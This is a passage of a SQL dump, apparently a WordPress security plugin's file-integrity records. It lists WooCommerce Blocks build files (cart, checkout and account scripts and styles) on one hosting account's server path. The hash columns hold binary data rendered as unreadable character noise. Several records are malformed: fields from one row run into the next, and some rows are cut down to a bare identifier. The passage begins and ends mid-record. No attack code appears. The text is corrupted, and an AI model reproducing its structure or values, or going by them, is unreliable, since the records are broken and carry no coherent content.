b?W5q%t','',0,'?'),(';:媸ʖ:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VɾB.fkx','C)|0ǻW)z\"R(\\(3SIH','',0,'?'),('r{؂: da ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-accepted-payment-methods-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-accepted-payment-methods-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡhtg[3','',0,'?'),('\'1x#1[nEi','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-cross-sells-products-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-cross-sells-products-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KD~kNmdLJ','\"mǸ73ovXk\"M','',0,'?'),('_mŽ@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-cross-sells-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-cross-sells-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q2rA','$r S.Uݢ_33؊*','',0,'?'),('-Rahi T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment--checkout-blocks/express-payment-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment--checkout-blocks/express-payment-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U q?Đj s','>xluȴ0?YY(1ۧ','',0,'?'),('|z珿$R+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^D.wU<@','%¯\"M`؉#P:q','',0,'?'),('?^ ΖÁ&e','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-express-payment-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X%ݡ?',' vK`M\'3i!G0A!7','',0,'?'),('!cJ@R3\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-items-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-items-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ql|-\'V8','<GEs>QlPjVS\0','',0,'?'),('.O|\r3,nO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-items-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-items-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vDF=_','hvn`g_qXRd4J','',0,'?'),('L\rTBp㫾','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items--mini-cart-contents-block/products-table-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items--mini-cart-contents-block/products-table-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/NyςsP;#w','X޻p3v&0ᰕxJW,<*F','',0,'?'),('}\'^G\0\0Q','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#E P$','Jl㺡Ə6wSz\'þE%ꑝ','',0,'?'),('j3hRcO>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-line-items-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_]s\\ﯛ\'P4','%#A zm\Z (Ѝnt\"','',0,'?'),('ff=湧7S\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-order-summary-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-order-summary-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0_t*yƝ;|','\ZWeu/\\UF7=K','',0,'?'),('Z8k;5S(x-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-order-summary-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-order-summary-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w.l@]*n\ZV','iCI~=TDZz HQx','',0,'?'),('Lq~x7p{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-totals-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-totals-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l_\0:+ J',' :cU$iǾr3W/cl','',0,'?'),('6r0V۪W','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-totals-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/cart-totals-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n>趛D6','pfkKZSiܤcv/','',0,'?'),('\Zk jWF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/empty-cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/empty-cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jbɰ:W\0s)','УρBvf5mEK','',0,'?'),('hm$1ǘ\\#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/empty-cart-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/empty-cart-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DȞ.S5YK','@*h73-l^UlJr%Uϝ$X','',0,'?'),('6K+E|&)4W','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/filled-cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/filled-cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\"\0N|uE','K3/U z~_a-գ;:','',0,'?'),('W m$[׀','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/filled-cart-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/filled-cart-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}>c81A-P','}{]}2y.meg~G ','',0,'?'),('i\'PFT}aL','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-coupon-form-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-coupon-form-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!N٦_V:t','VGsІ5S}d֪sG{F^rn','',0,'?'),('g %Oq;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-coupon-form-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-coupon-form-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P-e|','q:Gٶ\'čchf%(|','',0,'?'),('F)a!=pU©\'r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-discount-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-discount-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@reߤ/\"u','^oxgMp%v*r~d\"[W\"','',0,'?'),('7E#CJfM','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-fee-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-fee-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+9G2&AN>5','( 5Z~9=Ƴǯ3]o 0g\rc/t','',0,'?'),('e襓nΞct','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-heading-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-heading-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jp K','\rb| oЃ.z&k.uu2@T','',0,'?'),('E\n7\\:_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-heading-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-heading-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߘ}TcP\0Ƿ\\k','[wozExsƜN\r*wQA','',0,'?'),('&`K3','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-shipping-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-shipping-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P<9J\rBc3','4\ZI jͰ ˴q7;=w','',0,'?'),('Y@9+C Gۿ4>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-shipping-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-shipping-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L794k}h^$','7蛭!î`Z_zo§$L(H8','',0,'?'),('%m4|oCM[}H}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-subtotal-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-subtotal-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Fo6Mso','O~<⏁f7oë','',0,'?'),('~\09F:C','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-subtotal-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-subtotal-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*,P\Z]','_\\S\";leb\'ϷcYW5F','',0,'?'),('c\r|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-taxes-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-taxes-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D%-[uHL|','Y& _<*7vyPdrw','',0,'?'),('8Ca)Q4P','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-taxes-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/order-summary-taxes-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hb8%P.G^P','Uie؆<WPܨ\r͡','',0,'?'),('ѦrJʵ= MW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/proceed-to-checkout-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/proceed-to-checkout-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܴsMlY','&fϸ JRpHfUH','',0,'?'),('U>5P@4sY.p','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/proceed-to-checkout-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-blocks/proceed-to-checkout-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-`<\\z\'','ElЛ0IMM{V^jd}s΍I','',0,'?'),('g -S.?%:j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0h:z','䒧ЪT7j˚7a˺lL3','',0,'?'),('+|,ŇW2-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nz:e\' ','?&CShj[33r)m','',0,'?'),('2܍bq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n9`OH3jik','밂AzÉ߄2`35Car','',0,'?'),('Hd\"b$9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Ow6@\r!*','vJz1rw+smVp).5s','',0,'?'),('|r-I2hS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/cart.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',JE&#','DJ&q|.GhR=ci','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions--checkout-blocks/terms-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions--checkout-blocks/terms-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f8wĭC<#ѥ','5? oɷ):h.\">|仇','',0,'?'),('E^m\\2#I?','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')`\nj<{wQy','3c-YZ&Pz[]\ZR*bu\\','',0,'?'),('?O{\0;99','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/actions-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^5A\'\0>@','1\n`K\0wmt1i`y$ ','',0,'?'),('*i_\ZS_\\K|,.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/billing-address-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/billing-address-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9x(X:O','oCjjۆdyƞ}jB','',0,'?'),('M\'I@Hy!','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/billing-address-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/billing-address-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l7PR{y(+','ޫ&aB-3r%cixBrU\"','',0,'?'),(' 8[թOa','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/contact-information-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/contact-information-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.o]?3]',':','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/fields-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/fields-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Mt\\=\\ɐ','=ӫh\r  O.ZMu~Q','',0,'?'),('ϓZz[>j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/fields-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/fields-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rYI^E|w','{\"\r#49摻ݵoΤOqTe','',0,'?'),('QJVa\Z\0Q','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-note-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-note-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vɵV','xFOH#TBc\nR/\\ԝ|o\r','',0,'?'),('|RM\"1P&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-cart-items-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-cart-items-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=K(fc4(','gWuH$b\nOL#8Mv\"','',0,'?'),('$í@iVBfH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-cart-items-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-cart-items-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?n\087','/4dUm3T(Xxf&','',0,'?'),('V{P\\t','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-subtotal-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-subtotal-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cwm=FXBd','JaPW~ڐWgzƢN8qfd','',0,'?'),('a>Į ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-subtotal-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-subtotal-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!YHm-','>6`އ1$+ƍC\'K@9C ^\Z','',0,'?'),('\0@86 @\0\'T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-taxes-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-taxes-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AꊲGj0slF&','h9ʼn]Y o6ߟW','',0,'?'),('S]K@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-taxes-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/order-summary-taxes-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O-(:_-PB;D','<&-/p;Qk<^C)(j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/payment-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/payment-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-xjFMC','<MdǕVmh%j,*','',0,'?'),('5E !\nԃ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/payment-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/payment-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0h! 6','ƄOf_8ʲ3s7g\'Kt[','',0,'?'),('%6&dSK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/pickup-options-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/pickup-options-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĉr%Si-g','aǤ$G<|t\0T)cBX u','',0,'?'),('/6 b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/pickup-options-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/pickup-options-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AZeȺɅq;','bc(&\"O+= nU䕑+.bQl>\\ ','',0,'?'),('!\Zb9$!Q:D','',0,'?'),(',\Z[%HJRDb0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/shipping-methods-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/shipping-methods-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+VZi6N(ʤ','9ǥU0Hl\n#+?sWC9N','',0,'?'),('oJc`R1(=','',0,'?'),('F+l9p','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/terms-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/terms-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JrwvtOr','$Y?&5,otGyu3','',0,'?'),('mf?`NPe6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/terms-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/terms-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᚞gÈRXz','2 Ǫ\'{|THtt󼈵','',0,'?'),('w8?1@Ҥb vJ*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/totals-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/totals-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Z4M]ϔZ','b!0)(Vv_nR\"Etoy~ҷ','',0,'?'),('0ޯss9ws','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/totals-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-blocks/totals-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\\\r\0w','_1QLViw0@;>×>R','',0,'?'),('0SB!w}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')5:,UF!t','\r+\0Pc y\0̂ݙ\r t7iQu','',0,'?'),('YEZSM|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7vmu0 ','3<\0)01OpФ꠰4]wa','',0,'?'),('~աE>9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',;tox^','r&]]> Odse뢊ж','',0,'?'),('e^\n7WLPo','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' s\'\' U}N','1;$7|U*!>̡Zi7','',0,'?'),('fQJGj 7z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nx۪˭3{','=嘣Ġ%,J o/OxL','',0,'?'),('!\\;kSvb','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N#\\Ye$Wd','jWآX2E>W#7','',0,'?'),('-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/checkout.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P?1\' ~qぇ','ٽX5K ZA/RS& 01 ','',0,'?'),(' \ZQa\0SnI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܕMhڃη@q+','0kMVVU]7$P8','',0,'?'),('̱ ˝\n~g','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e[>{b^s','f,KG .B2fLi@OϷ','',0,'?'),(',j ㍨LHO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&awIFh','\nFYO+tEo@~d\rph)','',0,'?'),('(68tB}\rI+h<.O','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' |PhWi=','jC>`R?y;l','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/customer-account.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wm\"&u','|1I\n\r% 6C(R.Bxt','',0,'?'),('v 9yУwB4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\0w}P ','><2a*ZQ ;Jܣ','',0,'?'),('+&ݮV\0`qBK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eb{Co^yzp;f','o(|ki+Tixm3 (e','',0,'?'),('㱛9ǂLHY','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v>B 